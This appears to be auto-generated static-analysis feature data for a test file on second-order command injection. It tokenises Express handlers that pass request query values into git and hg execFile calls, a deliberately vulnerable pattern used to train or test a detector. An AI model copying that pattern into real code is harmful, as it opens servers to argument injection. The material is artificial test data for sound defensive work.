autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:5:20:50 | execFil ... HEAD"]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:5:20:50 | execFil ... HEAD"]) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:5:20:50 | execFil ... HEAD"]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:5:20:50 | execFil ... HEAD"]) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:14:20:18 | "git" | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:14:20:18 | "git" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:14:20:18 | "git" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:14:20:18 | "git" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:14:20:18 | "git" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:14:20:18 | "git" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:14:20:18 | "git" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:14:20:18 | "git" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:21:20:49 | ["ls-re ... "HEAD"] | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:21:20:49 | ["ls-re ... "HEAD"] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:21:20:49 | ["ls-re ... "HEAD"] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:21:20:49 | ["ls-re ... "HEAD"] | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:21:20:49 | ["ls-re ... "HEAD"] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:21:20:49 | ["ls-re ... "HEAD"] | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:21:20:49 | ["ls-re ... "HEAD"] | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:21:20:49 | ["ls-re ... "HEAD"] | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:22:20:32 | "ls-remote" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:22:20:32 | "ls-remote" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:22:20:32 | "ls-remote" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:22:20:32 | "ls-remote" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:22:20:32 | "ls-remote" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:22:20:32 | "ls-remote" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:22:20:32 | "ls-remote" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:22:20:32 | "ls-remote" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:22:20:32 | "ls-remote" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:22:20:32 | "ls-remote" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:35:20:40 | remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:35:20:40 | remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:35:20:40 | remote | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:35:20:40 | remote | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:35:20:40 | remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:35:20:40 | remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:35:20:40 | remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:35:20:40 | remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:35:20:40 | remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:35:20:40 | remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:43:20:48 | "HEAD" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:43:20:48 | "HEAD" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:43:20:48 | "HEAD" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:43:20:48 | "HEAD" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:43:20:48 | "HEAD" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:43:20:48 | "HEAD" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:43:20:48 | "HEAD" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:43:20:48 | "HEAD" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:43:20:48 | "HEAD" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:43:20:48 | "HEAD" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:7:23:12 | remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:7:23:12 | remote | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:7:23:12 | remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:7:23:12 | remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:7:23:12 | remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:7:23:23 | remote.startsWith | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:7:23:23 | remote.startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:7:23:23 | remote.startsWith | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:7:23:23 | remote.startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:7:23:23 | remote.startsWith | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:7:23:31 | exceptional return of remote. ... "git@") | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:7:23:31 | exceptional return of remote. ... "git@") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:7:23:31 | exceptional return of remote. ... "git@") | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:7:23:31 | exceptional return of remote. ... "git@") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:7:23:31 | exceptional return of remote. ... "git@") | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:7:23:31 | remote. ... "git@") | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:7:23:31 | remote. ... "git@") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:7:23:31 | remote. ... "git@") | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:7:23:31 | remote. ... "git@") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:7:23:31 | remote. ... "git@") | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:14:23:23 | startsWith | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:14:23:23 | startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:14:23:23 | startsWith | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:14:23:23 | startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:14:23:23 | startsWith | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:25:23:30 | "git@" | CalleeFlexibleAccessPath | remote.startsWith | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:25:23:30 | "git@" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:25:23:30 | "git@" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:25:23:30 | "git@" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:25:23:30 | "git@" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:25:23:30 | "git@" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:25:23:30 | "git@" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:25:23:30 | "git@" | receiverName | remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:5:24:12 | execFile | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:5:24:12 | execFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:5:24:12 | execFile | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:5:24:12 | execFile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:5:24:12 | execFile | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:5:24:50 | exceptional return of execFil ... HEAD"]) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:5:24:50 | exceptional return of execFil ... HEAD"]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:5:24:50 | exceptional return of execFil ... HEAD"]) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:5:24:50 | exceptional return of execFil ... HEAD"]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:5:24:50 | exceptional return of execFil ... HEAD"]) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:5:24:50 | execFil ... HEAD"]) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:5:24:50 | execFil ... HEAD"]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:5:24:50 | execFil ... HEAD"]) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:5:24:50 | execFil ... HEAD"]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:5:24:50 | execFil ... HEAD"]) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:14:24:18 | "git" | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:14:24:18 | "git" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:14:24:18 | "git" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:14:24:18 | "git" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:14:24:18 | "git" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:14:24:18 | "git" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:14:24:18 | "git" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:14:24:18 | "git" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:21:24:49 | ["ls-re ... "HEAD"] | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:21:24:49 | ["ls-re ... "HEAD"] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:21:24:49 | ["ls-re ... "HEAD"] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:21:24:49 | ["ls-re ... "HEAD"] | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:21:24:49 | ["ls-re ... "HEAD"] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:21:24:49 | ["ls-re ... "HEAD"] | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:21:24:49 | ["ls-re ... "HEAD"] | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:21:24:49 | ["ls-re ... "HEAD"] | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:22:24:32 | "ls-remote" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:22:24:32 | "ls-remote" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:22:24:32 | "ls-remote" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:22:24:32 | "ls-remote" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:22:24:32 | "ls-remote" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:22:24:32 | "ls-remote" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:22:24:32 | "ls-remote" | enclosingFunctionName | app.get#functionalargument | +| 